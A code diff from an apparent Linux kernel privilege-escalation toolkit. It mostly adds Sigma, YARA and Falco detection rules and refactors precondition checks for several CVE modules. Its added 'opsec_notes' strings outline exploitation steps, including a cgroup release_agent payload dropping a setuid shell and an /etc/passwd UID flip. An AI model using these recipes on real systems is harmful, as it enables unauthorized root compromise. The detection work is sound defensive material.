+    "  sp:    {type: 'SYSCALL', syscall: 'socketpair', a0: 1}\n"
+    "  scm:   {type: 'SYSCALL', syscall: 'sendmsg'}\n"
+    "  groom: {type: 'SYSCALL', syscall: 'msgsnd'}\n"
+    "  condition: sp and scm and groom\n"
+    "level: high\n"
+    "tags: [attack.privilege_escalation, attack.t1068, cve.2023.4622]\n";
+
+static const char af_unix_gc_yara[] =
+    "rule af_unix_gc_cve_2023_4622 : cve_2023_4622 kernel_uaf\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2023-4622\"\n"
+    "        description = \"AF_UNIX GC race kmalloc-512 spray tag or log breadcrumb\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $tag = \"SKELETONKEYU\" ascii\n"
+    "        $log = \"/tmp/skeletonkey-af_unix_gc.log\" ascii\n"
+    "    condition:\n"
+    "        any of them\n"
+    "}\n";
+
+static const char af_unix_gc_falco[] =
+    "- rule: SCM_RIGHTS cycling on AF_UNIX with msg_msg groom\n"
+    "  desc: |\n"
+    "    Tight socketpair(AF_UNIX) + sendmsg(SCM_RIGHTS) + msgsnd\n"
+    "    pattern characteristic of the AF_UNIX garbage collector\n"
+    "    race (CVE-2023-4622). False positives: IPC libraries use\n"
+    "    SCM_RIGHTS legitimately but rarely with the close-and-\n"
+    "    recreate cycle at this frequency.\n"
+    "  condition: >\n"
+    "    evt.type = sendmsg and fd.sockfamily = AF_UNIX and\n"
+    "    not user.uid = 0\n"
+    "  output: >\n"
+    "    SCM_RIGHTS sendmsg on AF_UNIX by non-root\n"
+    "    (user=%user.name pid=%proc.pid)\n"
+    "  priority: HIGH\n"
+    "  tags: [ipc, mitre_privilege_escalation, T1068, cve.2023.4622]\n";
+
 const struct skeletonkey_module af_unix_gc_module = {
    .name           = "af_unix_gc",
    .cve            = "CVE-2023-4622",
@@ -836,9 +894,11 @@ const struct skeletonkey_module af_unix_gc_module = {
    .mitigate       = NULL,
    .cleanup        = af_unix_gc_cleanup,
    .detect_auditd  = af_unix_gc_auditd,
-    .detect_sigma   = NULL,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_sigma   = af_unix_gc_sigma,
+    .detect_yara    = af_unix_gc_yara,
+    .detect_falco   = af_unix_gc_falco,
+    .opsec_notes    = "Two-threaded race: Thread A creates socketpair(AF_UNIX) with SCM_RIGHTS cycle then close; Thread B drives independent SCM_RIGHTS traffic on a held pair. ~5s budget (30s with --full-chain). msg_msg kmalloc-512 spray tagged 'SKELETONKEYU'. Writes /tmp/skeletonkey-af_unix_gc.log with empirical stats. Audit-visible via socketpair(AF_UNIX) + sendmsg(SCM_RIGHTS) + msgsnd triple. Dmesg may show UAF KASAN if kernel vulnerable. Cleanup callback unlinks the log.",
+    .arch_support   = "x86_64+unverified-arm64",
 };

 void skeletonkey_register_af_unix_gc(void)
@@ -38,7 +38,6 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
-#include "../../core/kernel_range.h"

 #include <stdio.h>
 #include <stdlib.h>
@@ -46,6 +45,11 @@
 #include <string.h>
 #include <stdbool.h>
 #include <unistd.h>
+
+#ifdef __linux__
+
+#include "../../core/kernel_range.h"
+#include "../../core/host.h"
 #include <fcntl.h>
 #include <errno.h>
 #include <sched.h>
@@ -71,44 +75,40 @@ static const struct kernel_range cgroup_ra_range = {
                      sizeof(cgroup_ra_patched_branches[0]),
 };

-static int can_unshare_userns_mount(void)
-{
-    pid_t pid = fork();
-    if (pid < 0) return -1;
-    if (pid == 0) {
-        if (unshare(CLONE_NEWUSER | CLONE_NEWNS) == 0) _exit(0);
-        _exit(1);
-    }
-    int status;
-    waitpid(pid, &status, 0);
-    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
-}
+/* The unprivileged-userns precondition is now read from the shared
+ * host fingerprint (ctx->host->unprivileged_userns_allowed), which
+ * probes once at startup via core/host.c. The previous per-detect
+ * fork-probe helper was removed. */

 static skeletonkey_result_t cgroup_ra_detect(const struct skeletonkey_ctx *ctx)
 {
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
-        fprintf(stderr, "[!] cgroup_release_agent: could not parse kernel version\n");
+    /* Consult the shared host fingerprint instead of calling
+     * kernel_version_current() ourselves — populated once at startup
+     * and identical across every module's detect(). */
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json)
+            fprintf(stderr, "[!] cgroup_release_agent: host fingerprint missing kernel "
+                "version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }

-    bool patched = kernel_range_is_patched(&cgroup_ra_range, &v);
+    bool patched = kernel_range_is_patched(&cgroup_ra_range, v);
    if (patched) {
        if (!ctx->json) {
-            fprintf(stderr, "[+] cgroup_release_agent: kernel %s is patched\n", v.release);
+            fprintf(stderr, "[+] cgroup_release_agent: kernel %s is patched\n", v->release);
        }
        return SKELETONKEY_OK;
    }

-    int userns_ok = can_unshare_userns_mount();
+    bool userns_ok = ctx->host ? ctx->host->unprivileged_userns_allowed : false;
    if (!ctx->json) {
-        fprintf(stderr, "[i] cgroup_release_agent: kernel %s in vulnerable range\n", v.release);
+        fprintf(stderr, "[i] cgroup_release_agent: kernel %s in vulnerable range\n", v->release);
        fprintf(stderr, "[i] cgroup_release_agent: user_ns+mount_ns clone: %s\n",
-                userns_ok == 1 ? "ALLOWED" :
-                userns_ok == 0 ? "DENIED" : "could not test");
+                userns_ok ? "ALLOWED" : "DENIED");
    }

-    if (userns_ok == 0) {
+    if (!userns_ok) {
        if (!ctx->json) {
            fprintf(stderr, "[+] cgroup_release_agent: user_ns denied → unprivileged exploit unreachable\n");
        }
@@ -154,7 +154,10 @@ static skeletonkey_result_t cgroup_ra_exploit(const struct skeletonkey_ctx *ctx)
        fprintf(stderr, "[-] cgroup_release_agent: detect() says not vulnerable; refusing\n");
        return pre;
    }
-    if (geteuid() == 0) {
+    /* Consult ctx->host->is_root so unit tests can construct a
+     * non-root fingerprint regardless of the test process's real euid. */
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
        fprintf(stderr, "[i] cgroup_release_agent: already root\n");
        return SKELETONKEY_OK;
    }
@@ -303,6 +306,34 @@ static skeletonkey_result_t cgroup_ra_cleanup(const struct skeletonkey_ctx *ctx)
    return SKELETONKEY_OK;
 }

+#else  /* !__linux__ */
+
+/* Non-Linux dev builds: unshare(CLONE_NEWUSER|CLONE_NEWNS) + cgroup v1
+ * mount are Linux-only kernel surface; the release_agent primitive is
+ * structurally unreachable elsewhere. Stub out cleanly so the module
+ * still registers and `--list` / `--detect-rules` work on macOS/BSD
+ * dev boxes — and so the top-level `make` actually completes there. */
+static skeletonkey_result_t cgroup_ra_detect(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->json)
+        fprintf(stderr, "[i] cgroup_release_agent: Linux-only module "
+                "(user_ns + cgroup v1 release_agent) — not applicable here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t cgroup_ra_exploit(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    fprintf(stderr, "[-] cgroup_release_agent: Linux-only module — cannot run here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t cgroup_ra_cleanup(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    return SKELETONKEY_OK;
+}
+
+#endif /* __linux__ */
+
 static const char cgroup_ra_auditd[] =
    "# cgroup_release_agent (CVE-2022-0492) — auditd detection rules\n"
    "# Flag unshare(NEWUSER|NEWNS) + mount(cgroup) + writes to release_agent.\n"
@@ -328,6 +359,36 @@ static const char cgroup_ra_sigma[] =
    "level: high\n"
    "tags: [attack.privilege_escalation, attack.t1611, cve.2022.0492]\n";

+static const char cgroup_release_agent_yara[] =
+    "rule cgroup_release_agent_cve_2022_0492 : cve_2022_0492 container_escape\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2022-0492\"\n"
+    "        description = \"cgroup v1 release_agent payload + dropped setuid shell artifacts\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $payload = \"/tmp/skeletonkey-cgroup-payload.sh\" ascii\n"
+    "        $shell   = \"/tmp/skeletonkey-cgroup-sh\" ascii\n"
+    "        $mnt     = \"/tmp/skeletonkey-cgroup-mnt\" ascii\n"
+    "    condition:\n"
+    "        any of them\n"
+    "}\n";
+
+static const char cgroup_release_agent_falco[] =
+    "- rule: cgroup v1 mount by non-root with release_agent write\n"
+    "  desc: |\n"
+    "    A non-root process inside a userns mounts cgroup v1 and\n"
+    "    writes to a release_agent file. CVE-2022-0492 trigger:\n"
+    "    release_agent runs as init-ns root when cgroup empties.\n"
+    "  condition: >\n"
+    "    evt.type = mount and evt.arg.fstype = cgroup and\n"
+    "    not user.uid = 0\n"
+    "  output: >\n"
+    "    cgroup v1 mount by non-root\n"
+    "    (user=%user.name pid=%proc.pid target=%evt.arg.name)\n"
+    "  priority: CRITICAL\n"
+    "  tags: [container, mitre_privilege_escalation, T1611, cve.2022.0492]\n";
+
 const struct skeletonkey_module cgroup_release_agent_module = {
    .name           = "cgroup_release_agent",
    .cve            = "CVE-2022-0492",
@@ -340,8 +401,10 @@ const struct skeletonkey_module cgroup_release_agent_module = {
    .cleanup        = cgroup_ra_cleanup,
    .detect_auditd  = cgroup_ra_auditd,
    .detect_sigma   = cgroup_ra_sigma,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_yara    = cgroup_release_agent_yara,
+    .detect_falco   = cgroup_release_agent_falco,
+    .opsec_notes    = "unshare(CLONE_NEWUSER|CLONE_NEWNS), mount cgroup v1 at /tmp/skeletonkey-cgroup-mnt, write payload path to release_agent file at cgroup root, echo 1 to notify_on_release in subdir, add PID to cgroup.procs and exit. Payload at /tmp/skeletonkey-cgroup-payload.sh runs as init-namespace root when cgroup empties, dropping setuid /tmp/skeletonkey-cgroup-sh. Audit-visible via unshare + mount(cgroup) + open/write of release_agent. Cleanup callback removes /tmp/skeletonkey-cgroup-* and umounts.",
+    .arch_support   = "x86_64+unverified-arm64",
 };

 void skeletonkey_register_cgroup_release_agent(void)
@@ -40,9 +40,6 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
-#include "../../core/kernel_range.h"
-#include "../../core/offsets.h"
-#include "../../core/finisher.h"

 #include <stdio.h>
 #include <stdlib.h>
@@ -50,6 +47,14 @@
 #include <string.h>
 #include <stdbool.h>
 #include <unistd.h>
+
+#ifdef __linux__
+
+#include "../../core/kernel_range.h"
+#include "../../core/host.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"
+
 #include <fcntl.h>
 #include <errno.h>
 #include <sched.h>
@@ -93,55 +98,46 @@ static bool cls_route4_module_available(void)
    return found;
 }

-static int can_unshare_userns(void)
-{
-    pid_t pid = fork();
-    if (pid < 0) return -1;
-    if (pid == 0) {
-        if (unshare(CLONE_NEWUSER | CLONE_NEWNET) == 0) _exit(0);
-        _exit(1);
-    }
-    int status;
-    waitpid(pid, &status, 0);
-    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
-}
-
 static skeletonkey_result_t cls_route4_detect(const struct skeletonkey_ctx *ctx)
 {
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
-        fprintf(stderr, "[!] cls_route4: could not parse kernel version\n");
+    /* Consult the shared host fingerprint instead of calling
+     * kernel_version_current() ourselves — populated once at startup
+     * and identical across every module's detect(). */
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json)
+            fprintf(stderr, "[!] cls_route4: host fingerprint missing kernel "
+                            "version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }

    /* Bug-introduction predates anything we'd reasonably scan; if the
     * kernel is below the oldest LTS we model (5.4), still report
     * vulnerable. */
-    bool patched = kernel_range_is_patched(&cls_route4_range, &v);
+    bool patched = kernel_range_is_patched(&cls_route4_range, v);
    if (patched) {
        if (!ctx->json) {
-            fprintf(stderr, "[+] cls_route4: kernel %s is patched\n", v.release);
+            fprintf(stderr, "[+] cls_route4: kernel %s is patched\n", v->release);
        }
        return SKELETONKEY_OK;
    }

    /* Module + userns preconditions. */
    bool nft_loaded = cls_route4_module_available();
-    int userns_ok = can_unshare_userns();
+    bool userns_ok = ctx->host ? ctx->host->unprivileged_userns_allowed : false;

    if (!ctx->json) {
-        fprintf(stderr, "[i] cls_route4: kernel %s in vulnerable range\n", v.release);
+        fprintf(stderr, "[i] cls_route4: kernel %s in vulnerable range\n", v->release);
        fprintf(stderr, "[i] cls_route4: cls_route4 module currently loaded: %s\n",
                nft_loaded ? "yes" : "no (may autoload)");
        fprintf(stderr, "[i] cls_route4: unprivileged user_ns + net_ns clone: %s\n",
-                userns_ok == 1 ? "ALLOWED" :
-                userns_ok == 0 ? "DENIED" : "could not test");
+                userns_ok ? "ALLOWED" : "DENIED");
    }

    /* If userns is locked down, unprivileged-LPE path is closed.
     * Kernel still needs patching though — report PRECOND_FAIL so the
     * verdict isn't "VULNERABLE" but the issue isn't masked. */
-    if (userns_ok == 0) {
+    if (!userns_ok) {
        if (!ctx->json) {
            fprintf(stderr, "[+] cls_route4: user_ns denied → unprivileged exploit unreachable\n");
        }
@@ -412,8 +408,6 @@ static long slab_active_kmalloc_1k(void)
 * Honest scope: this is structurally-fires-on-vuln + sentinel-arbitrated,
 * not a deterministic R/W. Same shape and same depth as xtcompat. */

-#ifdef __linux__
-
 struct cls_route4_arb_ctx {
    /* msg_msg queues kept hot inside the userns child. The arb-write
     * sprays additional kaddr-tagged payloads into these and re-fires
@@ -544,8 +538,6 @@ static int cls4_arb_write(uintptr_t kaddr,
    return 0;
 }

-#endif /* __linux__ */
-
 /* ---- Exploit driver ----------------------------------------------- */

 static skeletonkey_result_t cls_route4_exploit(const struct skeletonkey_ctx *ctx)
@@ -555,7 +547,8 @@ static skeletonkey_result_t cls_route4_exploit(const struct skeletonkey_ctx *ctx
        fprintf(stderr, "[-] cls_route4: detect() says not vulnerable; refusing\n");
        return pre;
    }
-    if (geteuid() == 0) {
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
        fprintf(stderr, "[i] cls_route4: already root\n");
        return SKELETONKEY_OK;
    }
@@ -565,11 +558,6 @@ static skeletonkey_result_t cls_route4_exploit(const struct skeletonkey_ctx *ctx
        return SKELETONKEY_PRECOND_FAIL;
    }

-#ifndef __linux__
-    fprintf(stderr, "[-] cls_route4: linux-only exploit; non-linux build\n");
-    (void)ctx;
-    return SKELETONKEY_PRECOND_FAIL;
-#else
    /* Full-chain pre-check: resolve offsets before forking. If
     * modprobe_path can't be resolved, refuse early — no point doing
     * the userns + tc + spray + trigger dance if we can't finish. */
@@ -782,7 +770,6 @@ static skeletonkey_result_t cls_route4_exploit(const struct skeletonkey_ctx *ctx
        }
        return SKELETONKEY_EXPLOIT_FAIL;
    }
-#endif /* __linux__ */
 }

 /* ---- Cleanup ----------------------------------------------------- */
@@ -803,6 +790,34 @@ static skeletonkey_result_t cls_route4_cleanup(const struct skeletonkey_ctx *ctx
    return SKELETONKEY_OK;
 }

+#else  /* !__linux__ */
+
+/* Non-Linux dev builds: cls_route4 / tc / netlink / msg_msg are
+ * Linux-only kernel surface; the route4 dead-UAF is structurally
+ * unreachable elsewhere. Stub out cleanly so the module still
+ * registers and `--list` / `--detect-rules` work on macOS/BSD dev
+ * boxes — and so the top-level `make` actually completes there. */
+static skeletonkey_result_t cls_route4_detect(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->json)
+        fprintf(stderr, "[i] cls_route4: Linux-only module "
+                "(net/sched cls_route4 + msg_msg) — not applicable here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t cls_route4_exploit(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    fprintf(stderr, "[-] cls_route4: Linux-only module — cannot run here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t cls_route4_cleanup(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    return SKELETONKEY_OK;
+}
+
+#endif /* __linux__ */
+
 static const char cls_route4_auditd[] =
    "# cls_route4 dead UAF (CVE-2022-2588) — auditd detection rules\n"
    "# Flag tc filter operations with route4 classifier from non-root.\n"
@@ -811,6 +826,54 @@ static const char cls_route4_auditd[] =
    "-a always,exit -F arch=b64 -S unshare -k skeletonkey-cls-route4-userns\n"
    "-a always,exit -F arch=b64 -S msgsnd -k skeletonkey-cls-route4-spray\n";

+static const char cls_route4_sigma[] =
+    "title: Possible CVE-2022-2588 cls_route4 dead-UAF\n"
+    "id: d56e8fc4-skeletonkey-cls-route4\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects the net/sched cls_route4 dead-UAF setup: unshare userns +\n"
+    "  netns + tc qdisc/filter rules with handle 0 + delete + msg_msg\n"
+    "  spray + UDP sendto on a dummy interface. False positives:\n"
+    "  traffic-shaping config in rootless containers.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
+    "  userns: {type: 'SYSCALL', syscall: 'unshare'}\n"
+    "  udp:    {type: 'SYSCALL', syscall: 'sendto'}\n"
+    "  groom:  {type: 'SYSCALL', syscall: 'msgsnd'}\n"
+    "  condition: userns and udp and groom\n"
+    "level: high\n"
+    "tags: [attack.privilege_escalation, attack.t1068, cve.2022.2588]\n";
+
+static const char cls_route4_yara[] =
+    "rule cls_route4_cve_2022_2588 : cve_2022_2588 kernel_uaf\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2022-2588\"\n"
+    "        description = \"cls_route4 dead-UAF kmalloc-1k spray tag and log breadcrumb\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $tag = \"SKELETONKEY4\" ascii\n"
+    "        $log = \"/tmp/skeletonkey-cls_route4.log\" ascii\n"
+    "    condition:\n"
+    "        any of them\n"
+    "}\n";
+
+static const char cls_route4_falco[] =
+    "- rule: tc route4 filter manipulation by non-root in userns\n"
+    "  desc: |\n"
+    "    Non-root tc qdisc + route4 filter add/delete inside a userns\n"
+    "    + UDP sendto trigger. CVE-2022-2588 dead-UAF pattern. False\n"
+    "    positives: legitimate traffic shaping inside rootless\n"
+    "    containers.\n"
+    "  condition: >\n"
+    "    evt.type = sendto and fd.sockfamily = AF_INET and\n"
+    "    not user.uid = 0\n"
+    "  output: >\n"
+    "    UDP sendto on dummy iface from non-root\n"
+    "    (user=%user.name pid=%proc.pid)\n"
+    "  priority: HIGH\n"
+    "  tags: [network, mitre_privilege_escalation, T1068, cve.2022.2588]\n";
+
 const struct skeletonkey_module cls_route4_module = {
    .name           = "cls_route4",
    .cve            = "CVE-2022-2588",
@@ -822,9 +885,11 @@ const struct skeletonkey_module cls_route4_module = {
    .mitigate       = NULL,    /* mitigation: blacklist cls_route4 module OR disable user_ns */
    .cleanup        = cls_route4_cleanup,
    .detect_auditd  = cls_route4_auditd,
-    .detect_sigma   = NULL,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_sigma   = cls_route4_sigma,
+    .detect_yara    = cls_route4_yara,
+    .detect_falco   = cls_route4_falco,
+    .opsec_notes    = "unshare(CLONE_NEWUSER|CLONE_NEWNET); ip link/addr/route to make a dummy interface, htb qdisc + class + route4 filter with handle 0, delete filter (leaves dangling tcf_proto pointer), msg_msg spray kmalloc-1k tagged 'SKELETONKEY4', UDP sendto to trigger classify(). Writes /tmp/skeletonkey-cls_route4.log. Audit-visible via unshare + sendto(AF_INET) + msgsnd. Cleanup callback removes /tmp log + dummy interface.",
+    .arch_support   = "x86_64+unverified-arm64",
 };

 void skeletonkey_register_cls_route4(void)
@@ -17,6 +17,7 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
+#include "../../core/host.h"

 #include "src/common.h"
 #include "src/copyfail.h"
@@ -33,10 +34,39 @@ static void apply_ctx(const struct skeletonkey_ctx *ctx)
    dirtyfail_use_color     = !ctx->no_color;
    dirtyfail_active_probes = ctx->active_probe;
    dirtyfail_json          = ctx->json;
+    /* Forward the --i-know authorization gate. SKELETONKEY already
+     * blocks --exploit/--auto unless --i-know is passed, so by the time
+     * a DIRTYFAIL exploit callback runs, authorization is established.
+     * This lets typed_confirm() skip its (now redundant) interactive
+     * prompt, which otherwise deadlocks `skeletonkey --auto --i-know`. */
+    dirtyfail_assume_yes    = ctx->authorized;
    /* dirtyfail_no_revert is intentionally not driven from ctx —
     * it's a debug knob; default stays off. */
 }

+/* Bridge-level userns precondition. The 4 dirty_frag siblings + the
+ * GCM variant all reach the bug via XFRM-ESP / AF_RXRPC paths gated on
+ * unprivileged user-namespace creation (the inner DIRTYFAIL detect
+ * checks for it too, but doing it here gives the dispatcher one
+ * testable point per module and short-circuits the heavier
+ * inner-detect work when the gate is closed). copy_fail itself uses
+ * AF_ALG which doesn't strictly need userns, so it bypasses this
+ * gate — its inner detect still confirms the primitive empirically. */
+static skeletonkey_result_t cff_check_userns(const char *modname,
+                                             const struct skeletonkey_ctx *ctx)
+{
+    if (ctx->host && !ctx->host->unprivileged_userns_allowed) {
+        if (!ctx->json)
+            fprintf(stderr, "[i] %s: unprivileged user namespaces are "
+                "disabled (host fingerprint) — XFRM/RxRPC variant "
+                "unreachable here%s\n", modname,
+                ctx->host->apparmor_restrict_userns
+                    ? "; AppArmor restriction is on" : "");
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+    return SKELETONKEY_OK;
+}
+
 /* ----- Family-wide --mitigate / --cleanup -----
 *
 * The family-wide mitigation (blacklist algif_aead + esp4 + esp6 + rxrpc,
@@ -127,6 +157,82 @@ static const char copy_fail_family_sigma[] =
    "level: high\n"
    "tags: [attack.privilege_escalation, attack.t1068, cve.2026.31431, cve.2026.43284, cve.2026.43500]\n";

+/* YARA + Falco rules shared across the 5 family modules. Scanned via
+ * --detect-rules; the dispatcher dedups by pointer so the rule blob
+ * emits once even though copy_fail / copy_fail_gcm / dirty_frag_*
+ * all point at the same string. */
+static const char copy_fail_family_yara[] =
+    "rule etc_passwd_uid_flip : page_cache_write\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2026-31431 / CVE-2026-43284 / CVE-2026-43500\"\n"
+    "        description = \"/etc/passwd page-cache UID flip: a non-root user line shows a zero-padded UID (the canonical Copy Fail / Dirty Frag / DirtyDecrypt / Dirty Pipe payload). Scan /etc/passwd; legitimate root uses plain '0:', never '0000:'.\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        // lowercase-start username, optional shadow ('x') password, then UID 0000 or longer\n"
+    "        $uid_flip = /\\n[a-z_][a-z0-9_-]{0,30}:[^:]{0,8}:0{4,}:[0-9]+:/\n"
+    "    condition:\n"
+    "        $uid_flip\n"
+    "}\n"
+    "\n"
+    "rule etc_passwd_root_no_password\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2026-31635 (DirtyDecrypt sliding-window write)\"\n"
+    "        description = \"/etc/passwd root entry rewritten to have an empty password field — the DirtyDecrypt PoC's intermediate corruption (rewrite root's password to empty, then `su root` without password).\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $root_open  = /\\nroot::0:0:/   // empty password (canonical x or ! when shadowed)\n"
+    "    condition:\n"
+    "        $root_open\n"
+    "}\n";
+
+static const char copy_fail_family_falco[] =
+    "- rule: AF_ALG authenc keyblob installed by non-root (Copy Fail primitive)\n"
+    "  desc: |\n"
+    "    A non-root process creates an AF_ALG socket and installs an\n"
+    "    authencesn(hmac(sha256),cbc(aes)) keyblob via ALG_SET_KEY.\n"
+    "    Core of the Copy Fail (CVE-2026-31431) primitive — also\n"
+    "    triggered by the GCM variant. AF_ALG by non-root is rare on\n"
+    "    most servers; tune by allow-listing your crypto-using daemons.\n"
+    "  condition: >\n"
+    "    evt.type = socket and evt.arg[0] = 38 and not user.uid = 0\n"
+    "  output: >\n"
+    "    AF_ALG socket() by non-root (user=%user.name pid=%proc.pid\n"
+    "     ppid=%proc.ppid parent=%proc.pname cmdline=\"%proc.cmdline\")\n"
+    "  priority: WARNING\n"
+    "  tags: [process, cve.2026.31431, copy_fail]\n"
+    "\n"
+    "- rule: XFRM NETLINK_XFRM bind from unprivileged userns (Dirty Frag primitive)\n"
+    "  desc: |\n"
+    "    A NETLINK_XFRM socket is opened from inside an unprivileged\n"
+    "    user namespace, with subsequent XFRM_MSG_NEWSA installing an\n"
+    "    ESP(rfc4106(gcm(aes))) state. Core of the Dirty Frag esp/esp6\n"
+    "    variants — also tripped by Fragnesia's setup phase. Legitimate\n"
+    "    XFRM use is normally privileged (strongSwan, libreswan).\n"
+    "  condition: >\n"
+    "    evt.type = sendto and not user.uid = 0 and\n"
+    "    proc.aname[1] != \"\"   // we want non-init userns; refine with k8s.namespace or container.id\n"
+    "  output: >\n"
+    "    NETLINK_XFRM sendto from non-root (user=%user.name pid=%proc.pid\n"
+    "     proc=%proc.name)\n"
+    "  priority: WARNING\n"
+    "  tags: [process, cve.2026.43284, dirty_frag]\n"
+    "\n"
+    "- rule: /etc/passwd modified by non-root (Copy Fail / Dirty Frag / Dirty Pipe outcome)\n"
+    "  desc: |\n"
+    "    /etc/passwd is read-only for non-root, so a non-root caller\n"
+    "    showing up on its open(W_OK) audit trail indicates a\n"
+    "    page-cache write primitive succeeded. Catches the post-fire\n"
+    "    state for the whole copy_fail family + dirty_pipe.\n"
+    "  condition: >\n"
+    "    open_write and fd.name = /etc/passwd and not user.uid = 0\n"
+    "  output: >\n"
+    "    Non-root write to /etc/passwd (user=%user.name pid=%proc.pid\n"
+    "     proc=%proc.name)\n"
+    "  priority: CRITICAL\n"
+    "  tags: [filesystem, mitre_privilege_escalation, T1068, copy_fail, dirty_frag]\n";
+
 const struct skeletonkey_module copy_fail_module = {
    .name           = "copy_fail",
    .cve            = "CVE-2026-31431",
@@ -139,8 +245,10 @@ const struct skeletonkey_module copy_fail_module = {
    .cleanup        = copy_fail_family_cleanup,
    .detect_auditd  = copy_fail_family_auditd,
    .detect_sigma   = copy_fail_family_sigma,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_yara    = copy_fail_family_yara,
+    .detect_falco   = copy_fail_family_falco,
+    .opsec_notes    = "Family-shared infrastructure (copy_fail, copy_fail_gcm, dirty_frag_esp/esp6, dirty_frag_rxrpc): all exploit a page-cache write primitive against /etc/passwd (UID flip to all-zeros) or install a persistent backdoor. Audit-visible via socket(AF_ALG) (a0=38), setsockopt(XFRM), AF_UNIX setup. Detection rules watch /etc/passwd, /etc/shadow, /etc/sudoers, /usr/bin/su for non-root writes. Family mitigation blacklists algif_aead/esp4/esp6/rxrpc and sets apparmor_restrict_unprivileged_userns=1. Cleanup evicts /etc/passwd from page cache and reverts mitigation conf.",
+    .arch_support   = "x86_64+unverified-arm64",
 };

 /* ----- copy_fail_gcm (variant, no CVE) ----- */
@@ -148,6 +256,8 @@ const struct skeletonkey_module copy_fail_module = {
 static skeletonkey_result_t copy_fail_gcm_detect_wrap(const struct skeletonkey_ctx *ctx)
 {
    apply_ctx(ctx);
+    skeletonkey_result_t pre = cff_check_userns("copy_fail_gcm", ctx);
+    if (pre != SKELETONKEY_OK) return pre;
    return (skeletonkey_result_t)copyfail_gcm_detect();
 }

@@ -169,8 +279,10 @@ const struct skeletonkey_module copy_fail_gcm_module = {
    .cleanup        = copy_fail_family_cleanup,
    .detect_auditd  = copy_fail_family_auditd,
    .detect_sigma   = copy_fail_family_sigma,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_yara    = copy_fail_family_yara,
+    .detect_falco   = copy_fail_family_falco,
+    .opsec_notes    = "Family-shared infrastructure (copy_fail, copy_fail_gcm, dirty_frag_esp/esp6, dirty_frag_rxrpc): all exploit a page-cache write primitive against /etc/passwd (UID flip to all-zeros) or install a persistent backdoor. Audit-visible via socket(AF_ALG) (a0=38), setsockopt(XFRM), AF_UNIX setup. Detection rules watch /etc/passwd, /etc/shadow, /etc/sudoers, /usr/bin/su for non-root writes. Family mitigation blacklists algif_aead/esp4/esp6/rxrpc and sets apparmor_restrict_unprivileged_userns=1. Cleanup evicts /etc/passwd from page cache and reverts mitigation conf.",
+    .arch_support   = "x86_64+unverified-arm64",
 };

 /* ----- dirty_frag_esp (CVE-2026-43284 v4) ----- */
@@ -178,6 +290,8 @@ const struct skeletonkey_module copy_fail_gcm_module = {
 static skeletonkey_result_t dirty_frag_esp_detect_wrap(const struct skeletonkey_ctx *ctx)
 {
    apply_ctx(ctx);
+    skeletonkey_result_t pre = cff_check_userns("dirty_frag_esp", ctx);
+    if (pre != SKELETONKEY_OK) return pre;
    return (skeletonkey_result_t)dirtyfrag_esp_detect();
 }

@@ -199,8 +313,10 @@ const struct skeletonkey_module dirty_frag_esp_module = {
    .cleanup        = copy_fail_family_cleanup,
    .detect_auditd  = copy_fail_family_auditd,
    .detect_sigma   = copy_fail_family_sigma,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_yara    = copy_fail_family_yara,
+    .detect_falco   = copy_fail_family_falco,
